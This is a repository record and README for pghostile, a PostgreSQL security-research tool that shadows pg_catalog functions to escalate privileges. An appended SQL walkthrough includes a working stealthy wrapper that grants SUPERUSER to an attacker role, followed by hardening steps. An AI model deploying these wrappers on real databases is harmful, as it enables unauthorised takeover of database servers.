{"id":19693873,"url":"https://github.com/aiven-open/pghostile","last_synced_at":"2025-04-29T10:30:39.733Z","repository":{"id":146304109,"uuid":"512732159","full_name":"Aiven-Open/pghostile","owner":"Aiven-Open","description":"Pghostile is a tool to automate the exploitation of PostgreSQL® specific vulnerabilities that could lead to privilege escalation. It can be used to identify security issues in PostgreSQL extensions, to test system hardening and for security research in general.","archived":false,"fork":false,"pushed_at":"2023-08-17T09:21:12.000Z","size":66,"stargazers_count":12,"open_issues_count":0,"forks_count":2,"subscribers_count":13,"default_branch":"main","last_synced_at":"2025-04-05T14:51:13.844Z","etag":null,"topics":["exploitation","postgresql","security","security-audit","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"postgresql","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Aiven-Open.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null}},"created_at":"2022-07-11T11:39:53.000Z","updated_at":"2025-02-15T18:14:51.000Z","dependencies_parsed_at":"2023-08-17T10:25:34.247Z","dependency_job_id":null,"html_url":"https://github.com/Aiven-Open/pghostile","commit_stats":null,"previous_names":["aiven-open/pghostile"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fp
ghostile/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Aiven-Open","download_url":"https://codeload.github.com/Aiven-Open/pghostile/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251483633,"owners_count":21596575,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploitation","postgresql","security","security-audit","security-tools"],"created_at":"2024-11-11T19:18:32.006Z","updated_at":"2025-04-29T10:30:38.878Z","avatar_url":"https://github.com/Aiven-Open.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PGHOSTILE\nPghostile can make PostgreSQL® a hostile environment for superusers and a nice playground for attackers.\nPghostile is an automated tool for overriding \"system\" functions (the ones from the 'pg_catalog' schema), allowing an attacker to elevate privileges if/when these functions are called by a superuser.\n\nIt can also be used to test the security of PostgreSQL extensions. You can run pghostile to create the \"exploit functions\", then run the extension's unit tests and see if you get superuser power after that.\n\nSee our blog post about pghostile and PostgreSQL extension security: [Aiven's Blog](https://aiven.io/blog/aiven-security-agent-for-postgresql).\n\n## How it works\nIn PostgreSQL every function is identified by its name plus the number/types of its arguments (like in Java). 
If a function is defined to accept a numeric value and you define a function with the same name that accepts an integer, your function will be called if the input parameter is an integer and the original one will be called if the input is a fractional number such as 1.1.\nName resolution always consults pg_catalog, but it collects candidates from every schema in the 'search_path' and picks the one whose argument types match the call best, so a wrapper in public with a closer argument type wins over the pg_catalog original (a wrapper with identical argument types would not). Considering that an unprivileged user can create functions in the public schema by default up to PostgreSQL 14 (PostgreSQL 15 revoked CREATE on public from PUBLIC, so on newer versions an explicit grant is needed) and that the public schema is part of the default 'search_path', it's relatively easy to trick a superuser into running code from public instead of pg_catalog.\n\nIn a few words, pghostile searches pg_catalog for functions (and operators) that can be overridden and creates a malicious wrapper for each of them in the public schema.\n\nCurrently, it can identify ~1000 calls that can lead to privilege escalation. To give an example, the list below contains some of them:\n```SQL\nselect 1.1 * 1;\nselect 1 = 1.1;\nselect 1.1 / 1;\nselect array [1, 2] = array [1, 2];\n\nselect sha256('randstr');\nselect unnest(array [1, 2]);\nselect array_replace(array [1, 2], 1, 1);\nselect date_cmp('2022-07-12', '2022-07-12');\nselect time_cmp('00:00:00', '00:00:00');\nselect varcharout('randstr');\nselect round(1, 1);\nselect floor(1);\nselect power(1, 1);\nselect int4(1);\nselect div(1, 1);\nselect format('randstr', 1);\nselect pg_sleep(1.1);\nselect inet_out('10.0.0.1');\nselect hashmacaddr('01:01:01:02:02:02');\nselect hashinet('10.0.0.1');\nselect xml_out('\u003cfoo /\u003e');\nselect json_out('[true]');\nselect uuid_out('93967025-8c89-4320-ad51-4ef50694502f');\n```\n\nThen, if the superuser runs something like `select sha256('test123')` you will be superuser in no time ;)\n\n## Usage\n```\npositional arguments:\n  db_username           Database username\n  db_name               Database name\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -X, --disable-exploits-creation\n                        Do not create exploit functions\n  -H DB_HOST, --db-host DB_HOST\n                        Database host (default 127.0.0.1)\n  -p DB_PORT, --db-port 
DB_PORT\n                        Database port\n  -P, --ask-pass        Prompt for database password\n  -o OUT, --out OUT     Output dir (default ./out)\n  -T, --skip-tests      Disable test\n  -s, --disable-stealth-mode\n                        Disable stealth mode\n  -S DB_SSL_MODE, --db-ssl-mode DB_SSL_MODE\n                        Database ssl mode (default None)\n  -x EXPLOIT_PAYLOAD, --exploit-payload EXPLOIT_PAYLOAD\n                        The SQL commands\n  -t, --track-execution\n                        Track the exploit function execution\n  -O, --no-overwrite    Stop execution if at least one exploit function already exists\n```\n\nWith the -X option you can disable the actual exploit creation. It will just run the tests to see which functions can be overridden.\nWith the -T option you can disable the tests and just create the exploit functions.\nThe -x option allows you to specify what SQL command(s) should be used in your exploit. By default it's ```ALTER USER \u003cdb_username\u003e WITH SUPERUSER;```.\nThe -s option disables the \"stealth mode\". In stealth mode the wrapping functions call the original function from pg_catalog after running the payload, so the superuser sees no anomaly when calling a wrapped function. It also lowers the chance of breaking execution flows that could lead to other vulnerable points.\nThe -t option enables tracking of the execution of the exploit functions: every successful call of an exploit function is logged into a table of the current DB (pghostile.triggers). 
It's useful for extension analysis.\nThe -P option forces a password prompt even if the PGPASSWORD environment variable is set.\n\n### Example\n```\npghostile.py user1 testdb -H 10.0.0.100\n```\n```\nStarting ...\n\n[ * ] 1272 interesting functions have been identified\n[ * ] Detecting operators\n[ * ] Testing 1697 functions\n[ * ] 907 exploitable functions found\n[ * ] 1005 function and parameters combinations run successfully\n[ * ] 70 operators call run successfully\n[ * ] Creating exploit functions\n[ * ] Done!\n\n907 functions have been created\n1075 queries can trigger the exploit\nThe './out' folder contains the output\n```\n\n## PG Extension audit\nPghostile can be used to audit the security of PostgreSQL extensions:\n1. Run pghostile with the '-t' option to enable execution tracking\n```\npghostile.py -t user1 testdb\n```\n2. Run, as superuser, as many of the extension's queries/functions as possible\n```\npsql -U postgres testdb \u003c extension_queries.sql\n```\n3. Check if you are superuser\n```sql\nSELECT rolsuper FROM pg_roles WHERE rolname = 'user1';\n```\n4. If you are superuser, all the functions that triggered the exploit are listed in:\n```sql\nSELECT * FROM pghostile.triggers;\n```\n\n## Trademarks\nThe terms Postgres and PostgreSQL are registered trademarks of the PostgreSQL Community Association of Canada.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faiven-open%2Fpghostile","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Faiven-open%2Fpghostile","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faiven-open%2Fpghostile/lists"}
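The shadowing mechanism described in the README's "How it works" section and the superuser check from its "PG Extension audit" procedure, written out by hand as one added SQL example. This is not code from the pghostile repository: it is a single wrapper of the kind the tool generates, followed by the hardening a reviewer would apply. The role name `attacker`, the placeholder extension function `myext.process(text)` and the assumption that `attacker` holds CREATE on schema `public` (the default up to PostgreSQL 14) are illustrative. The payload mirrors the tool's default `ALTER USER <db_username> WITH SUPERUSER;`.

```sql
-- Added example, not part of pghostile. Assumptions: an unprivileged role
-- "attacker" with CREATE on schema public, and a superuser who later runs an
-- unqualified sha256() call with the default search_path ("$user", public).

------------------------------------------------------------------
-- 1. Run as "attacker": shadow pg_catalog.sha256(bytea) from public.
--    The catalog version takes bytea; this one takes text. For an untyped
--    literal such as sha256('test123') the text overload is the better match,
--    so resolution picks public.sha256 even though pg_catalog is consulted
--    first. An overload with the exact same argument types would NOT win.
------------------------------------------------------------------
CREATE FUNCTION public.sha256(input text) RETURNS bytea
LANGUAGE plpgsql AS $$
BEGIN
  -- SECURITY INVOKER is the default: the payload runs with the caller's
  -- privileges. If the caller is a superuser the ALTER succeeds; for anyone
  -- else the permission error is swallowed so nothing looks unusual
  -- (the same idea as pghostile's "stealth mode").
  BEGIN
    EXECUTE 'ALTER USER attacker WITH SUPERUSER';
  EXCEPTION WHEN insufficient_privilege THEN
    NULL;
  END;
  -- Forward to the genuine, schema-qualified implementation so the caller
  -- gets the digest it asked for. The catalog reads the untyped literal as
  -- bytea, which for ASCII input is the same byte string convert_to() yields.
  RETURN pg_catalog.sha256(pg_catalog.convert_to(input, 'UTF8'));
END;
$$;

------------------------------------------------------------------
-- 2. Run as a superuser: an innocent-looking call that executes the wrapper.
------------------------------------------------------------------
SELECT sha256('test123');

------------------------------------------------------------------
-- 3. Run as "attacker": confirm the escalation (same check as step 3 of the
--    README's audit procedure; expected after step 2: rolsuper = true).
------------------------------------------------------------------
SELECT rolsuper FROM pg_roles WHERE rolname = 'attacker';

------------------------------------------------------------------
-- 4. Hardening, run as an administrator. Any one of these breaks the chain.
------------------------------------------------------------------
-- a) Do not let ordinary roles create objects in a schema that privileged
--    sessions resolve names through. This is the PostgreSQL 15 default.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- b) Pin search_path in privileged sessions. pg_temp is listed explicitly and
--    last; left implicit it is searched before everything else, and a
--    temporary object could shadow the catalog the same way.
SET search_path = pg_catalog, pg_temp;

-- c) Schema-qualify calls in code that runs as superuser, including operators,
--    which need the OPERATOR() syntax. Both lines bypass anything in public.
SELECT pg_catalog.sha256('test123'::bytea);
SELECT 1.1 OPERATOR(pg_catalog.*) 1;

-- d) For functions shipped by an extension, fix the search_path on the
--    function itself so it does not inherit the caller's. Placeholder name:
-- ALTER FUNCTION myext.process(text) SET search_path = pg_catalog, pg_temp;

-- Remove the demonstration wrapper.
DROP FUNCTION IF EXISTS public.sha256(text);
```

Step 3 is the same `pg_roles` lookup the README uses to decide whether an extension's test-suite run triggered an exploit function. Note that the wrapper only helps an attacker because it is a *different* overload: the README's int-versus-numeric example and this text-versus-bytea one both rely on the call's argument types matching the shadow more closely than the original, which is why pghostile tests "function and parameter combinations" rather than function names alone.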